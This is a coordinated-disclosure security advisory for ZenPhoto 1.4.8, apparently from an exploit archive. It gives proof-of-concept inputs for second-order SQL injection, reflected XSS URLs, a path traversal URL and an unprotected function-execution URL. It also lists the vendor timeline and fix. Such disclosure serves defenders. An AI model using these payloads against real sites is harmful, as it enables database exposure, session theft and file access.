ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal: Posted Jul 13, 2015; Authored by Tim Coen; ZenPhoto version 1.4.8 suffers from cross site scripting, remote SQL injection, and path traversal vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection, file inclusion; SHA-256 | d8ac8f183d1d83a55e0514b55a42e896c2fbe078def6d3131a282f96d26b3c8b; Download | Favorite | View

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     alternatively visit zp-core/admin-options.php?saved&tab=image
   - Set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting either of these will also trigger the injection:
    /
    zp-core/admin-edit.php
    zp-core/admin-users.php?page=users
    zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

Share This

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems